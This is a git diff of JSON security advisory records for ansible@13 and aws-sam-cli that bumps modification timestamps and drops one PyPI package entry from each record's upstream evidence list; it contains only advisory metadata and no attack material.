"schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54273", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-4fvr-rgm6-gqmc", "CVE-2026-54273", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54274.json b/advisories/BREW-ansible@13-CVE-2026-54274.json index b8cbbaab65e..19c6066a931 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54274.json +++ b/advisories/BREW-ansible@13-CVE-2026-54274.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54274", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-xcgm-r5h9-7989", "CVE-2026-54274", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54275.json b/advisories/BREW-ansible@13-CVE-2026-54275.json index a4d67747b6c..d3922c7798e 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54275.json +++ b/advisories/BREW-ansible@13-CVE-2026-54275.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54275", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-4m7w-qmgq-4wj5", "CVE-2026-54275", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54276.json b/advisories/BREW-ansible@13-CVE-2026-54276.json index 22025e539aa..120f511057e 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54276.json +++ b/advisories/BREW-ansible@13-CVE-2026-54276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54276", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hpj7-wq8m-9hgp", "CVE-2026-54276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54277.json b/advisories/BREW-ansible@13-CVE-2026-54277.json index f6d33b01277..6a8ecd45a95 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54277.json +++ b/advisories/BREW-ansible@13-CVE-2026-54277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54277", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-63hw-fmq6-xxg2", "CVE-2026-54277", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54278.json b/advisories/BREW-ansible@13-CVE-2026-54278.json index 52fd6f7edec..ab1a5a51f56 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54278.json +++ b/advisories/BREW-ansible@13-CVE-2026-54278.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54278", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-g3cq-j2xw-wf74", "CVE-2026-54278", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54279.json b/advisories/BREW-ansible@13-CVE-2026-54279.json index ce018a83f26..16596707e18 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54279.json +++ b/advisories/BREW-ansible@13-CVE-2026-54279.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54279", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-2fqr-mr3j-6wp8", "CVE-2026-54279", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54280.json b/advisories/BREW-ansible@13-CVE-2026-54280.json index 744fc7d5f82..1548ca61d5c 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54280.json +++ b/advisories/BREW-ansible@13-CVE-2026-54280.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54280", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9x8q-7h8h-wcw9", "CVE-2026-54280", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-57585.json b/advisories/BREW-ansible@13-CVE-2026-57585.json index fdacd99eb92..3a7337377c4 100644 --- a/advisories/BREW-ansible@13-CVE-2026-57585.json +++ b/advisories/BREW-ansible@13-CVE-2026-57585.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-57585", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-6v7p-g79w-8964", "CVE-2026-57585", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "msgpack", - "subject_version": "1.2.1", - "key": "pkg:pypi/msgpack@1.2.1", - "resource": "msgpack" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-59881.json b/advisories/BREW-ansible@13-CVE-2026-59881.json index bc3473decd8..5214ef056d3 100644 --- a/advisories/BREW-ansible@13-CVE-2026-59881.json +++ b/advisories/BREW-ansible@13-CVE-2026-59881.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-59881", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mq44-7p77-q5h7", "CVE-2026-59881", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-59884.json b/advisories/BREW-ansible@13-CVE-2026-59884.json index 0deaab51ef3..6056b7f6c30 100644 --- a/advisories/BREW-ansible@13-CVE-2026-59884.json +++ b/advisories/BREW-ansible@13-CVE-2026-59884.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-59884", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-m4p7-r5rc-7g4j", "CVE-2026-59884", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-59885.json b/advisories/BREW-ansible@13-CVE-2026-59885.json index 2454c787b2b..f5037c5125e 100644 --- a/advisories/BREW-ansible@13-CVE-2026-59885.json +++ b/advisories/BREW-ansible@13-CVE-2026-59885.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-59885", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8ppf-4f7h-5ppj", "CVE-2026-59885", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-59886.json b/advisories/BREW-ansible@13-CVE-2026-59886.json index d4ee8796f26..779eef34be7 100644 --- a/advisories/BREW-ansible@13-CVE-2026-59886.json +++ b/advisories/BREW-ansible@13-CVE-2026-59886.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-59886", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hm4w-wwcw-mr6r", "CVE-2026-59886", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-59890.json b/advisories/BREW-ansible@13-CVE-2026-59890.json index 19371b50561..223dcaba6d7 100644 --- a/advisories/BREW-ansible@13-CVE-2026-59890.json +++ b/advisories/BREW-ansible@13-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-59890", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-69243.json b/advisories/BREW-ansible@13-CVE-2026-69243.json index 2fd16d18dc4..77ab1801521 100644 --- a/advisories/BREW-ansible@13-CVE-2026-69243.json +++ b/advisories/BREW-ansible@13-CVE-2026-69243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-69243", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mfx4-hv73-q22v", "CVE-2026-69243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-69244.json b/advisories/BREW-ansible@13-CVE-2026-69244.json index bd05d09a8c8..3f227f2a664 100644 --- a/advisories/BREW-ansible@13-CVE-2026-69244.json +++ b/advisories/BREW-ansible@13-CVE-2026-69244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-69244", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cq5v-8q36-5273", "CVE-2026-69244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2013-1633.json b/advisories/BREW-aws-sam-cli-CVE-2013-1633.json index ee422d35849..135e956fc4b 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2013-1633.json +++ b/advisories/BREW-aws-sam-cli-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2013-1633", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2013-4314.json b/advisories/BREW-aws-sam-cli-CVE-2013-4314.json index a0ca967e8cd..88bdd72218a 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2013-4314.json +++ b/advisories/BREW-aws-sam-cli-CVE-2013-4314.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2013-4314", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-6748-36qp-fx6r", "CVE-2013-4314", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2014-0012.json b/advisories/BREW-aws-sam-cli-CVE-2014-0012.json index 2d04dffa9e2..5539d080771 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2014-0012.json +++ b/advisories/BREW-aws-sam-cli-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2014-0012", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2014-1402.json b/advisories/BREW-aws-sam-cli-CVE-2014-1402.json index 43ce8679156..7aba9985aec 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2014-1402.json +++ b/advisories/BREW-aws-sam-cli-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2014-1402", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2014-1829.json b/advisories/BREW-aws-sam-cli-CVE-2014-1829.json index 76e6b33db0f..8752b78e944 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2014-1829.json +++ b/advisories/BREW-aws-sam-cli-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2014-1829", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2014-1830.json b/advisories/BREW-aws-sam-cli-CVE-2014-1830.json index 94c5191a3b6..15e419c529b 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2014-1830.json +++ b/advisories/BREW-aws-sam-cli-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2014-1830", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2015-2296.json b/advisories/BREW-aws-sam-cli-CVE-2015-2296.json index 04a8dfca897..ceb7d26f340 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2015-2296.json +++ b/advisories/BREW-aws-sam-cli-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2015-2296", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2015-8557.json b/advisories/BREW-aws-sam-cli-CVE-2015-8557.json index 84bc3eb25c5..27bdbace8ef 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2015-8557.json +++ b/advisories/BREW-aws-sam-cli-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2015-8557", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2016-10516.json b/advisories/BREW-aws-sam-cli-CVE-2016-10516.json index b4b9f3e5898..f54102d4f1f 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2016-10516.json +++ b/advisories/BREW-aws-sam-cli-CVE-2016-10516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2016-10516", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-h2fp-xgx6-xh6f", "CVE-2016-10516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2016-10745.json b/advisories/BREW-aws-sam-cli-CVE-2016-10745.json index 6c5feea3faf..9292a2d409d 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2016-10745.json +++ b/advisories/BREW-aws-sam-cli-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2016-10745", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2016-9015.json b/advisories/BREW-aws-sam-cli-CVE-2016-9015.json index e3c88992a3c..c8e387dd04c 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2016-9015.json +++ b/advisories/BREW-aws-sam-cli-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2016-9015", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2017-18342.json b/advisories/BREW-aws-sam-cli-CVE-2017-18342.json index 86f6b3b9f8f..18d19ca0136 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2017-18342.json +++ b/advisories/BREW-aws-sam-cli-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2017-18342", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2018-1000656.json b/advisories/BREW-aws-sam-cli-CVE-2018-1000656.json index 679d7064432..b7b148d30ca 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2018-1000656.json +++ b/advisories/BREW-aws-sam-cli-CVE-2018-1000656.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2018-1000656", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-562c-5r94-xh97", "CVE-2018-1000656", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "flask", - "subject_version": "3.1.3", - "key": "pkg:pypi/flask@3.1.3", - "resource": "flask" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2018-1000807.json b/advisories/BREW-aws-sam-cli-CVE-2018-1000807.json index ff3107c6dad..f1fff8a29ce 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2018-1000807.json +++ b/advisories/BREW-aws-sam-cli-CVE-2018-1000807.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2018-1000807", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-p28m-34f6-967q", "CVE-2018-1000807", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2018-1000808.json b/advisories/BREW-aws-sam-cli-CVE-2018-1000808.json index d71c5c155dc..5a79746b0d3 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2018-1000808.json +++ b/advisories/BREW-aws-sam-cli-CVE-2018-1000808.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2018-1000808", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-2rcm-phc9-3945", "CVE-2018-1000808", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2018-18074.json b/advisories/BREW-aws-sam-cli-CVE-2018-18074.json index 311ba6e14f7..289dec569ae 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2018-18074.json +++ b/advisories/BREW-aws-sam-cli-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2018-18074", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2018-20060.json b/advisories/BREW-aws-sam-cli-CVE-2018-20060.json index 6a4bdd2141e..50414553112 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2018-20060.json +++ b/advisories/BREW-aws-sam-cli-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2018-20060", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2018-25091.json b/advisories/BREW-aws-sam-cli-CVE-2018-25091.json index 658c8f60fd0..fda42d118bf 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2018-25091.json +++ b/advisories/BREW-aws-sam-cli-CVE-2018-25091.json @@ -2,7 